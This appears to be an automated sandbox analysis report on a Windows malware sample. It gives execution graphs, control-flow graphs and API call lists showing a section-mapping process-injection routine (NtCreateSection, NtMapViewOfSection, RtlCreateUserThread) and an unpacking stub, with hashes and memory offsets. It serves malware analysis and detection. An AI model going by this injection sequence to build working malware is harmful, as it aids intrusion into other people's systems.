                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_581000_jghruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: d6e07bd13e477c12f16283f6322ee00abbbfd7e5362513ee2dd086a2c22d3b96
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: 6E113C79A00208EFDB01DF98C985E98BFF5AF08351F158094F9489B362D375EA50DF80

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:32.7%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:147
                                                                                                                                        Total number of Limit Nodes:6
                                                                                                                                        execution_graph 3401 4019c0 3402 4019c8 3401->3402 3403 4019e7 3401->3403 3404 401a29 Sleep 3403->3404 3405 4014fb 7 API calls 3404->3405 3406 401a44 3405->3406 3407 4015fb 7 API calls 3406->3407 3408 401a55 3406->3408 3407->3408 3345 402f42 3347 402f18 3345->3347 3346 4019e0 15 API calls 3348 40304f 3346->3348 3347->3346 3347->3348 3361 403103 3362 403246 3361->3362 3363 40312d 3361->3363 3363->3362 3364 4031f0 RtlCreateUserThread NtTerminateProcess 3363->3364 3364->3362 3253 401606 3253->3253 3254 401609 3253->3254 3255 4016af NtDuplicateObject 3254->3255 3264 4017cb 3254->3264 3256 4016cc NtCreateSection 3255->3256 3255->3264 3257 4016f2 NtMapViewOfSection 3256->3257 3258 40174c NtCreateSection 3256->3258 3257->3258 3259 401715 NtMapViewOfSection 3257->3259 3260 401778 3258->3260 3258->3264 3259->3258 3261 401733 3259->3261 3262 401782 NtMapViewOfSection 3260->3262 3260->3264 3261->3258 3263 4017a9 NtMapViewOfSection 3262->3263 3262->3264 3263->3264 3265 401613 3266 40161c 3265->3266 3267 4016af NtDuplicateObject 3266->3267 3276 4017cb 3266->3276 3268 4016cc NtCreateSection 3267->3268 3267->3276 3269 4016f2 NtMapViewOfSection 3268->3269 3270 40174c NtCreateSection 3268->3270 3269->3270 3271 401715 NtMapViewOfSection 3269->3271 3272 401778 3270->3272 3270->3276 3271->3270 3273 401733 3271->3273 3274 401782 NtMapViewOfSection 3272->3274 3272->3276 3273->3270 3275 4017a9 NtMapViewOfSection 3274->3275 3274->3276 3275->3276 3161 403257 3162 4031f0 RtlCreateUserThread NtTerminateProcess 3161->3162 3164 403261 3161->3164 3163 403246 3162->3163 3329 402ed9 3331 402e8d 3329->3331 3330 4019e0 15 API calls 3332 40304f 3330->3332 3331->3329 3331->3330 3331->3332 3284 5b0001 3285 5b0005 3284->3285 3290 5b092b GetPEB 3285->3290 3287 5b0030 3292 5b003c 3287->3292 3291 5b0972 3290->3291 3291->3287 3293 5b0049 3292->3293 3294 5b0e0f 2 API calls 3293->3294 3295 5b0223 3294->3295 3296 5b0d90 GetPEB 3295->3296 3297 5b0238 VirtualAlloc 3296->3297 3298 5b0265 3297->3298 3299 5b02ce VirtualProtect 3298->3299 3301 5b030b 3299->3301 3300 5b0439 VirtualFree 3304 5b04be LoadLibraryA 3300->3304 3301->3300 3303 5b08c7 3304->3303 3305 5b0005 3306 5b092b GetPEB 3305->3306 3307 5b0030 3306->3307 3308 5b003c 7 API calls 3307->3308 3309 5b0038 3308->3309 3165 5b003c 3166 5b0049 3165->3166 3178 5b0e0f SetErrorMode SetErrorMode 3166->3178 3171 5b0265 3172 5b02ce VirtualProtect 3171->3172 3174 5b030b 3172->3174 3173 5b0439 VirtualFree 3177 5b04be LoadLibraryA 3173->3177 3174->3173 3176 5b08c7 3177->3176 3179 5b0223 3178->3179 3180 5b0d90 3179->3180 3181 5b0dad 3180->3181 3182 5b0dbb GetPEB 3181->3182 3183 5b0238 VirtualAlloc 3181->3183 3182->3183 3183->3171 3409 4019eb 3410 4019f0 3409->3410 3411 401a29 Sleep 3410->3411 3412 4014fb 7 API calls 3411->3412 3413 401a44 3412->3413 3414 4015fb 7 API calls 3413->3414 3415 401a55 3413->3415 3414->3415 3333 4014fa 3334 40150c 3333->3334 3335 4015ea 3334->3335 3336 4016af NtDuplicateObject 3334->3336 3336->3335 3337 4016cc NtCreateSection 3336->3337 3338 4016f2 NtMapViewOfSection 3337->3338 3339 40174c NtCreateSection 3337->3339 3338->3339 3340 401715 NtMapViewOfSection 3338->3340 3339->3335 3341 401778 3339->3341 3340->3339 3342 401733 3340->3342 3341->3335 3343 401782 NtMapViewOfSection 3341->3343 3342->3339 3343->3335 3344 4017a9 NtMapViewOfSection 3343->3344 3344->3335 3184 7831c5 3185 7831d4 3184->3185 3188 783965 3185->3188 3193 783980 3188->3193 3189 783989 CreateToolhelp32Snapshot 3190 7839a5 Module32First 3189->3190 3189->3193 3191 7839b4 3190->3191 3194 7831dd 3190->3194 3195 783624 3191->3195 3193->3189 3193->3190 3196 78364f 3195->3196 3197 783698 3196->3197 3198 783660 VirtualAlloc 3196->3198 3197->3197 3198->3197 3199 402fbe 3200 402fc3 3199->3200 3201 40304f 3200->3201 3203 4019e0 3200->3203 3204 4019e7 3203->3204 3205 401a29 Sleep 3204->3205 3210 4014fb 3205->3210 3207 401a44 3209 401a55 3207->3209 3222 4015fb 3207->3222 3209->3201 3220 40150c 3210->3220 3211 4016af NtDuplicateObject 3212 4016cc NtCreateSection 3211->3212 3221 4015ea 3211->3221 3213 4016f2 NtMapViewOfSection 3212->3213 3214 40174c NtCreateSection 3212->3214 3213->3214 3215 401715 NtMapViewOfSection 3213->3215 3216 401778 3214->3216 3214->3221 3215->3214 3217 401733 3215->3217 3218 401782 NtMapViewOfSection 3216->3218 3216->3221 3217->3214 3219 4017a9 NtMapViewOfSection 3218->3219 3218->3221 3219->3221 3220->3211 3220->3221 3221->3207 3223 40160b 3222->3223 3224 4016af NtDuplicateObject 3223->3224 3226 4017cb 3223->3226 3225 4016cc NtCreateSection 3224->3225 3224->3226 3227 4016f2 NtMapViewOfSection 3225->3227 3228 40174c NtCreateSection 3225->3228 3226->3209 3227->3228 3229 401715 NtMapViewOfSection 3227->3229 3228->3226 3230 401778 3228->3230 3229->3228 3233 401733 3229->3233 3230->3226 3231 401782 NtMapViewOfSection 3230->3231 3231->3226 3232 4017a9 NtMapViewOfSection 3231->3232 3232->3226 3233->3228

                                                                                                                                        Executed Functions

                                                                                                                                        Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 85 4014fb-401504 86 40151b 85->86 87 40150c-40152e 85->87 86->87 92 401531-401545 call 40127e 87->92 97 40154a-401555 92->97 97->97 98 401558-40155a 97->98 99 40155d-401572 98->99 102 401574-401579 99->102 104 4015c4 102->104 105 40157b 102->105 106 4015c6 104->106 107 40162f-401632 104->107 108 4015f6-4015f8 105->108 109 40157d-40159a 105->109 106->102 110 4015c8-4015cd 106->110 111 401634-401659 call 40127e 107->111 112 4016a5-4016a6 107->112 119 40159d 109->119 120 40152f-401530 109->120 115 401648-401659 110->115 116 4015cf-4015d0 110->116 124 40165b 111->124 125 40165e-401663 111->125 117 4016a7-4016a9 112->117 118 40162d 112->118 115->124 115->125 126 4015d2-4015e8 116->126 127 4015b6-4015b9 116->127 122 401987 117->122 123 4016af-4016c6 NtDuplicateObject 117->123 118->107 119->99 128 40159f-4015a1 119->128 120->92 136 401996-4019dd call 40127e 122->136 123->122 131 4016cc-4016f0 NtCreateSection 123->131 124->125 148 401989-401991 125->148 149 401669-40167a 125->149 134 4015ea-4015f5 126->134 135 40157c 126->135 127->111 133 4015bb-4015c3 127->133 129 4015a3 128->129 130 40161c 128->130 138 4015a5-4015a6 129->138 139 40161e-40162c 129->139 130->139 140 4016f2-401713 NtMapViewOfSection 131->140 141 40174c-401772 NtCreateSection 131->141 133->104 134->108 135->109 144 4015a9-4015b4 135->144 138->144 139->111 153 401643 139->153 140->141 146 401715-401731 NtMapViewOfSection 140->146 141->122 147 401778-40177c 141->147 144->127 146->141 152 401733-401749 146->152 147->122 154 401782-4017a3 NtMapViewOfSection 147->154 148->125 148->136 149->122 162 401680-4016a3 149->162 152->141 153->111 154->122 156 4017a9-4017c5 NtMapViewOfSection 154->156 156->122 161 4017cb call 4017d0 156->161 162->117
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                                                        • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                                                        • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                                                        • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A
                                                                                                                                        Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 171 4015fb-401604 172 401615 171->172 173 40160b-401611 171->173 172->173 174 401618-40162c 172->174 173->174 178 401643 174->178 179 401634-401659 call 40127e 174->179 178->179 184 40165b 179->184 185 40165e-401663 179->185 184->185 187 401989-401991 185->187 188 401669-40167a 185->188 187->185 193 401996-4019dd call 40127e 187->193 191 401680-4016a9 188->191 192 401987 188->192 191->192 200 4016af-4016c6 NtDuplicateObject 191->200 192->193 200->192 202 4016cc-4016f0 NtCreateSection 200->202 204 4016f2-401713 NtMapViewOfSection 202->204 205 40174c-401772 NtCreateSection 202->205 204->205 207 401715-401731 NtMapViewOfSection 204->207 205->192 209 401778-40177c 205->209 207->205 210 401733-401749 207->210 209->192 212 401782-4017a3 NtMapViewOfSection 209->212 210->205 212->192 214 4017a9-4017c5 NtMapViewOfSection 212->214 214->192 217 4017cb call 4017d0 214->217
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                                        • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                                                        • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                                        • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64
                                                                                                                                        Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 219 401613-40162c 223 401643 219->223 224 401634-401659 call 40127e 219->224 223->224 229 40165b 224->229 230 40165e-401663 224->230 229->230 232 401989-401991 230->232 233 401669-40167a 230->233 232->230 238 401996-4019dd call 40127e 232->238 236 401680-4016a9 233->236 237 401987 233->237 236->237 245 4016af-4016c6 NtDuplicateObject 236->245 237->238 245->237 247 4016cc-4016f0 NtCreateSection 245->247 249 4016f2-401713 NtMapViewOfSection 247->249 250 40174c-401772 NtCreateSection 247->250 249->250 252 401715-401731 NtMapViewOfSection 249->252 250->237 254 401778-40177c 250->254 252->250 255 401733-401749 252->255 254->237 257 401782-4017a3 NtMapViewOfSection 254->257 255->250 257->237 259 4017a9-4017c5 NtMapViewOfSection 257->259 259->237 262 4017cb call 4017d0 259->262
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                                        • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                                                        • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                                        • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64
                                                                                                                                        Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 264 401606-401607 264->264 265 401609 264->265 266 40160b-40162c 265->266 267 40163c-401659 call 40127e 265->267 277 401643 266->277 278 401634-401639 266->278 274 40165b 267->274 275 40165e-401663 267->275 274->275 280 401989-401991 275->280 281 401669-40167a 275->281 277->278 278->267 280->275 286 401996-4019dd call 40127e 280->286 284 401680-4016a9 281->284 285 401987 281->285 284->285 293 4016af-4016c6 NtDuplicateObject 284->293 285->286 293->285 295 4016cc-4016f0 NtCreateSection 293->295 297 4016f2-401713 NtMapViewOfSection 295->297 298 40174c-401772 NtCreateSection 295->298 297->298 300 401715-401731 NtMapViewOfSection 297->300 298->285 302 401778-40177c 298->302 300->298 303 401733-401749 300->303 302->285 305 401782-4017a3 NtMapViewOfSection 302->305 303->298 305->285 307 4017a9-4017c5 NtMapViewOfSection 305->307 307->285 310 4017cb call 4017d0 307->310
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1652636561-0
                                                                                                                                        • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                                        • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                                                        • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                                        • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64
                                                                                                                                        Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 312 401627-40162c 316 401643 312->316 317 401634-401659 call 40127e 312->317 316->317 322 40165b 317->322 323 40165e-401663 317->323 322->323 325 401989-401991 323->325 326 401669-40167a 323->326 325->323 331 401996-4019dd call 40127e 325->331 329 401680-4016a9 326->329 330 401987 326->330 329->330 338 4016af-4016c6 NtDuplicateObject 329->338 330->331 338->330 340 4016cc-4016f0 NtCreateSection 338->340 342 4016f2-401713 NtMapViewOfSection 340->342 343 40174c-401772 NtCreateSection 340->343 342->343 345 401715-401731 NtMapViewOfSection 342->345 343->330 347 401778-40177c 343->347 345->343 348 401733-401749 345->348 347->330 350 401782-4017a3 NtMapViewOfSection 347->350 348->343 350->330 352 4017a9-4017c5 NtMapViewOfSection 350->352 352->330 355 4017cb call 4017d0 352->355
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                                                                                        • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                                                                                        • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                                                                                                        • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64
                                                                                                                                        Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 357 401641-401659 call 40127e 364 40165b 357->364 365 40165e-401663 357->365 364->365 367 401989-401991 365->367 368 401669-40167a 365->368 367->365 373 401996-4019dd call 40127e 367->373 371 401680-4016a9 368->371 372 401987 368->372 371->372 380 4016af-4016c6 NtDuplicateObject 371->380 372->373 380->372 382 4016cc-4016f0 NtCreateSection 380->382 384 4016f2-401713 NtMapViewOfSection 382->384 385 40174c-401772 NtCreateSection 382->385 384->385 387 401715-401731 NtMapViewOfSection 384->387 385->372 389 401778-40177c 385->389 387->385 390 401733-401749 387->390 389->372 392 401782-4017a3 NtMapViewOfSection 389->392 390->385 392->372 394 4017a9-4017c5 NtMapViewOfSection 392->394 394->372 397 4017cb call 4017d0 394->397
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                                        • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                                                                                        • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                                        • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64
                                                                                                                                        Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 399 403103-403127 400 403246-40324b 399->400 401 40312d-403145 399->401 401->400 402 40314b-40315c 401->402 403 40315e-403167 402->403 404 40316c-40317a 403->404 404->404 405 40317c-403183 404->405 406 4031a5-4031ac 405->406 407 403185-4031a4 405->407 408 4031ce-4031d1 406->408 409 4031ae-4031cd 406->409 407->406 410 4031d3-4031d6 408->410 411 4031da 408->411 409->408 410->411 412 4031d8 410->412 411->403 413 4031dc-4031e1 411->413 412->413 413->400 414 4031e3-4031e6 413->414 414->400 415 4031e8-403243 RtlCreateUserThread NtTerminateProcess 414->415 415->400
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1921587553-0
                                                                                                                                        • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                                        • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                                                                                        • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                                        • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5
                                                                                                                                        Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83nativethreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 417 403257-40325f 418 4031f0-403243 RtlCreateUserThread NtTerminateProcess 417->418 419 403261-40327f 417->419 420 403246-40324b 418->420 425 403281 419->425 426 403286-403290 419->426 425->426 427 403283-403285 425->427 428 403292 426->428 429 403298-4032ba call 4012ec 426->429 427->426 428->429 430 403293-403297 428->430 435 4032be 429->435 435->435
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2326877906.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_35DB.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1921587553-0
                                                                                                                                        • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                                        • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                                                                                        • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                                        • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B
                                                                                                                                        Function 005B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
